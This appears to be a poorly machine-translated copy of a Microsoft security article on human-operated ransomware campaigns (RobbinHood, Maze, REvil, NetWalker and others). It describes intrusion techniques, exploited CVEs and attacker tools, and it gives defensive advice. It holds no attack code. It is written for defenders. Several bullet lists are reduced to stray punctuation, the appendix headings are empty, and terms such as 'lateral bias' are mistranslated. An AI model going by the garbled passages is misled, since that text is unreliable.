Get best of the week

How to reduce the risks associated with ransomware ransomware

Today, when remote work is becoming commonplace, and the load on information security specialists, especially in healthcare and other critical industries, has never been so high, the activities of hack groups managing cryptographic applications are not weakening.

Numerous hack groups, which within several months penetrated various networks and accumulated ā€œstrengthā€, activated dozens of copies of their ransomware applications in the first half of April. Attacks were hit by medical facilities, healthcare billing companies, manufacturers, transport companies, government agencies, and training software developers. This demonstrated that, despite the global crisis, such hack groups neglect the functioning of critical services. However, companies from other areas are also being attacked, so organizations need to pay particular attention to signs of compromise.

Within two weeks of the work of cryptographers, the number of attacks with extortion increased slightly. However, after a study conducted by Microsoft experts, as well as the results of an investigation of another incident conducted by the DART team (Microsoft Detection and Response Team), it turned out that many cases of compromise, which provided the possibility of attacks, occurred even earlier. Using the technique typical of attacks using human-controlled ransomware applications , attackers compromised target networks over the past few months and waited for the opportunity to monetize the result by deploying malware at the most appropriate time.

Many of these attacks began with research on vulnerable devices accessible from the Internet. In some cases, with the help of brute force, RDP servers were compromised. A wide range of tools was used during the attacks, but all of them used the same techniques that are typical for attacks using human-managed ransomware applications: theft of credentials and ā€œlateral displacementā€, after which the attackers deployed the tools as they saw fit. Since the introduction of ransomware applications takes place at the final stage of the attack, defenders should focus on finding traces of intruders stealing accounting information, as well as signs of ā€œlateral displacementā€.

In this article we will talk about the results of the analysis of such campaigns using ransomware applications.

Content:


We have added a number of technical details, including a guide to detect attacks and recommendations on the priority of information security actions.

Vulnerable and unmonitored systems accessible from the Internet and making it easy to carry out human-driven attacks


Although new extortion tools were deployed in recent attacks, many of the attacks used the infrastructure left over from previous campaigns. They also used techniques well known for other attacks using human-driven ransomware.

Unlike email-delivered malware attacks, which typically take place much faster, within an hour of their initial penetration, the April attacks are similar to the 2019 attacks using Doppelpaymer. Then the attackers gained access to the target networks in advance. Then they waited several months, choosing the right moment to deploy ransomware applications.

In recent attacks, systems accessible from the Internet and having the following disadvantages were used to penetrate target networks:

  • Remote Desktop Protocol (RDP) (MFA).
  • , (, Windows Server 2003 Windows Server 2008). .
  • -, IIS, , .
  • Citrix Application Delivery Controller (ADC) CVE-2019-19781.
  • Pulse Secure VPN CVE-2019-11510.

To prevent such attacks, it is critical to apply security patches to systems accessible from the Internet. Also note: although Microsoft experts have not yet observed this, the accumulated information indicates that in the end, attackers can take advantage of these vulnerabilities: CVE-2019-0604 , CVE-2020-0688 , CVE-2020-10189 .

As in many penetration cases, cybercriminals stole credentials, used ā€œlateral offsetā€ using popular tools like Mimikatz and Cobalt Strike, and engaged in network intelligence and data extraction. Malware operators gained access to accounts with administrator privileges, and in which case they were ready to commit even more destructive actions. In the networks in which the attackers installed their software, they deliberately maintained their presence at some endpoints, intending to start their activities again after the ransom was received or the systems were reinstalled. Although only a few hack groups became known through the sale of collected data, almost all of them looked at and extracted data during the attacks, even if they had not yet advertised or sold stolen information.

As in all attacks using human-controlled ransomware, in the cases described, the activity of attackers spread over the network, including email, endpoints, applications, and much more. Since it may even be difficult for experts to completely get rid of cybercriminals in a compromised network, it is extremely important to patch vulnerable systems accessible from the Internet and introduce restrictions in order to reduce risks.

Motley extortion company


This chapter describes the different types of attacks and ransomware families, but the attacks we have discussed follow one popular pattern, with slight variations. Attacks developed in a similar way, generally using the same techniques. And the choice of a particular ransomware program at the end of the attack depended almost entirely on the taste of the attackers.


RobbinHood Ransomware


RobbinHood ransomware operators attracted attention due to the use of vulnerable drivers to disable security software in the later stages of the attack. However, as in many similar attacks, they started with brute force for RDP on an insecure resource. As a result, attackers obtained high-privilege credentials, mainly from local admin accounts with common or common passwords, as well as service accounts with domain administrator privileges. RobbinHood operators, as well as Ryuk operators and other untwisted hack groups, leave behind new local and Active Directory accounts in order to gain access to the network again after removing their tools.

Vatet bootloader


Attackers often change their infrastructure, methods, and tools to avoid notoriety, which could attract the attention of law enforcement agencies or researchers in the field of information security. Often, hackers hold on to their tools, waiting for information security companies to consider the corresponding artifacts inactive to attract less attention. Vatet is a loader for the Cobalt Strike framework, which was used in attacks in November 2018, and again surfaced in recent events.

Probably, the loader operators intended to specialize in hospitals, medical facilities, insulin suppliers, manufacturers of medical equipment and other critical organizations. These are some of the most prolific ransomware software operators that relate to dozens of attacks.

With the help of Vatet and Cobalt Strike, the hack group installed various ransomware. They recently deployed an in-memory application that uses Alternate Data Streams (ADS) and shows simplified versions of buyback requirements from older application families. Attackers gain access to networks using the CVE-2019-19781 vulnerability , endpoint bruteforce with RDP, and mailing messages with .lnk files that run malicious PowerShell commands. Having penetrated the network, hackers steal credentials, including from the Credential Manager repository, and use ā€œlateral biasā€ until they gain domain administrator privileges. According to observations, before deploying ransomware, operators extract data from the network.

NetWalker Ransomware


NetWalker operators became notorious for attacks on hospitals and medical facilities during which they sent out letters promising to provide information about COVID-19. The NetWalker program was contained in the letters as a .vbs attachment, and this technique attracted media attention. However, operators also compromised the network using improperly configured IIS-based applications to launch the Mimikatz program and steal credentials. Then, using this information, the attackers launched PsExec, and as a result installed NetWalker.

PonyFinal ransomware


This Java program is considered a novelty, but attacks using it are not uncommon. Operators compromised web systems accessible from the Internet and received privileged credentials. To ensure the stability of their presence on the attacked network, attackers use the PowerShell commands to launch the mshta.exe system tool and configure a reverse shell connection based on the popular PowerShell framework for attacks. Also, hackers used legitimate tools like Splashtop to maintain connection to remote desktops.

Maze Ransomware


One of the first ransomware campaigns to hit the headlines for selling stolen data. Maze continues to specialize in technology providers and public services. This ransomware was used against managed service providers (MSPs) to gain access to the data and networks of their customers.

Maze spread through letters, but operators also installed the program after gaining access to networks using common attack vectors such as RDP brute force. Having penetrated the network, the attackers steal credentials, perform a ā€œlateral offsetā€ to gain access to resources and extract data, and then install the ransomware.

During a recent hacker campaign, Microsoft researchers tracked how Maze operators gained access through the RDP bruteforce of a local admin account on an Internet-accessible system. After the password brute force, the operators were able to perform a ā€œside shiftā€, because the built-in admin accounts at other endpoints used the same password.

Having stolen the credentials from the domain administrator's account, the hackers used Cobalt Strike, PsExec and a number of other tools to deliver all kinds of payload and gain access to the data. Attackers organized a file-free presence on the network using the task scheduler and services that run remote PowerShell-based shells. Also, hackers turned on Windows Remote Management to maintain control with a stolen domain administrator account. To weaken control over information security in preparation for installing the ransomware, the attackers manipulated various settings through group policies.

Ransomware REvil


This is probably the first group of ransomware operators to exploit network vulnerabilities in Pulse VPN to steal credentials in order to gain access to the network. REvil (or Sodinokibi) became known for penetrating the MSP, gaining access to the networks and documents of their customers, as well as selling access to them. Attackers continued to do this during the current crisis, attacking MSP and other targets, including government agencies. REvil attacks are distinguished by the use of new vulnerabilities, but their methods are similar to those of many other hack groups: after penetrating the network, tools like Mimikatz and PsExec are used to steal credentials, "side bias" and reconnaissance.

Other ransomware families


During the period under review, the use of such families of applications managed by people was also noted:

  • Paradise It used to be distributed directly through letters, but now it is used in human-driven attacks.
  • RagnarLocker. Used by a group that actively used RDP and Cobalt Strike with stolen credentials.
  • MedusaLocker. Probably installed through pre-existing Trickbot infections.
  • Lockbit Distributed by operators who used the publicly available CrackMapExec penetration testing tool to perform ā€œlateral displacementā€.

Immediate response to ongoing attacks


We strongly recommend that organizations immediately check for alerts related to the described attacks and prioritize investigation and system recovery. What should defenders pay attention to:

  • PowerShell, Cobalt Strike , Ā« Ā».
  • , , Local Security Authority Subsystem Service (LSASS) , .
  • , USN ā€” .

Companies using Microsoft Defender Advanced Threat Protection (ATP) can refer to the threat analysis report for details of relevant alerts and advanced detection techniques. Those who use the Microsoft Threat Experts service can also use targeted attack notifications that include detailed history, recommended protection measures, and recovery tips.

If your network has been attacked, immediately follow the steps below to assess the extent of the situation. When determining the effect of these attacks, you should not rely solely on indicators of compromise (IOC), since most of the mentioned ransomware programs use a ā€œone-timeā€ infrastructure, their authors often change their tools and systems, determining the capabilities of their detection targets . To the extent possible, means of detecting and minimizing exposure should use techniques based on comprehensive behavioral patterns. You also need to close vulnerabilities used by cybercriminals as soon as possible.

Analyze attacked endpoints and credentials


Identify all credentials that are available on the attacked endpoint. They should be considered accessible to attackers, and all accounts associated with them should be compromised. Note that attackers can copy not only the credentials of accounts logged in in interactive or RDP sessions, but also copy cached credentials and passwords for serving accounts and scheduled tasks, which are stored in the LSA Secrets registry section.

  • For endpoints built into Microsoft Defender ATP , use advanced methods for identifying accounts that logged in to attacked points. To do this, there is a hunting query in the threat analysis report.
  • Windows, , ā€” 4624 2 10. 4 5.


Isolate key points that contain signs of control and control or that have become the target for "lateral displacement." Identify these endpoints using advanced search queries or other direct search methods for relevant IOCs. Isolate machines using Microsoft Defender ATP or use other data sources, such as NetFlow, to search within SIEM or another centralized event management tool. Look for signs of ā€œlateral displacementā€ from known compromised endpoints.

Close vulnerabilities accessible from the Internet


Identify perimeter systems that attackers can use to gain access to your network. You can supplement your analysis using the public scanning interface, for example, shodan.io . Hackers may be interested in such systems:

  • RDP or virtual desktops without multi-factor authentication.
  • Citrix ADC Systems with CVE-2019-19781 Vulnerability.
  • Pulse Secure VPN systems with CVE-2019-11510 vulnerability.
  • Microsoft SharePoint Servers with vulnerability CVE-2019-0604.
  • Microsoft Exchange servers with vulnerability CVE-2020-0688.
  • Zoho ManageEngine systems with vulnerability CVE-2020-10189.

To further reduce the vulnerability of an organization, Microsoft Defender ATP customers can take advantage of Threat and Vulnerability Management (TVM) capabilities to identify, prioritize, and close vulnerabilities in the wrong configuration. TVM allows IT security professionals and administrators to jointly get rid of detected weaknesses.

Examine and repair malware infected devices


Many hackers infiltrate networks through already implemented programs like Emotet and Trickbot. These tool families are classified as banking trojans that can deliver any payload, including permanent software bookmarks. Examine and eliminate all known infections and consider them possible attack vectors of dangerous human opponents. Be sure to check all open credentials, additional types of payloads, and signs of ā€œlateral displacementā€ before restoring the attacked endpoints or changing passwords.

Information hygiene to protect networks from human-driven ransomware


As hacker operators find more victims, defenders should assess risks in advance using all available tools. Continue to apply all proven preventive solutions ā€” credential hygiene, minimum privileges and host firewalls ā€” that prevent attacks that exploit security flaws and redundant privileges.

Increase your networkā€™s resistance to penetration, reactivation of software bookmarks and ā€œlateral displacementā€ with the following measures:


For more tips on improving protection against human -controlled ransomware programs and creating more reliable protection against cyber attacks in general, see Human-operated ransomware attacks: A preventable disaster .

Microsoft Threat Protection: coordinated protection against complex and large-scale ransomware-driven human-driven applications


The April increase in the number of attacks using ransomware showed that hackers are not worried about the consequences due to the interruptions in their services during the global crisis.

Attacks using human-controlled ransomware programs represent a new level of threat, because attackers are versed in system administration and configuration of protection tools, so they can find a way to penetrate with the least resistance. Faced with an obstacle, they try to break it. And if it doesnā€™t work out, they demonstrate ingenuity in finding new ways of attack development. Therefore, attacks using human-controlled ransomware are complex and widespread. Two identical attacks do not happen.

Microsoft Threat Protections (MTP)provides coordinated defense that helps block the entire chain of complex attacks using human-driven ransomware. MTP combines the capabilities of various Microsoft 365 security services to manage the protection, prevention, detection, and response of endpoints, email, accounts, and applications.

Using built-in intelligence, automation and integration tools, MTP is able to block attacks, eliminate the presence of intruders and automatically recover attacked resources. This tool compares and consolidates alerts and alerts to help advocates prioritize incidents in terms of investigation and response. MTP also has unique cross-domain search capabilities that will help to identify the growth of the attack and understand how to strengthen the defense in each case.

Microsoft Threat Protection is part of the chip-to-cloud approach, which combines the protection of hardware, operating system and cloud protection. Hardware-supported security features in Windows 10, such as address space layout randomization (ASLR), control flow protection (CFG), and others, increase the platform's resistance to many serious threats, including those that exploit kernel driver vulnerabilities. These security features are seamlessly integrated into Microsoft Defender ATP, which provides end-to-end protection that starts with a strong hardware root of trust. On computers with a secure kernel ( Secured-core PC ), these restrictions are enabled by default.

We continue to work with our customers, partners, and the research community to track people-driven ransomware and other sophisticated tools. In difficult cases, customers can use the Microsoft Detection and Response (DART) command to help investigate and recover.

Appendix: MITER ATT & CK Discovered Techniques


Attacks using human-managed ransomware programs use a wide range of techniques that are available to attackers after gaining control of privileged domain accounts. Listed below are the techniques that were widely used in attacks against healthcare and critical organizations in April 2020.

Access to credentials:


Long-term presence:


Management and control:


Study:


Execution:


"Lateral displacement":


Avoidance of Protective Equipment:


Impact:

More articles:


All Articles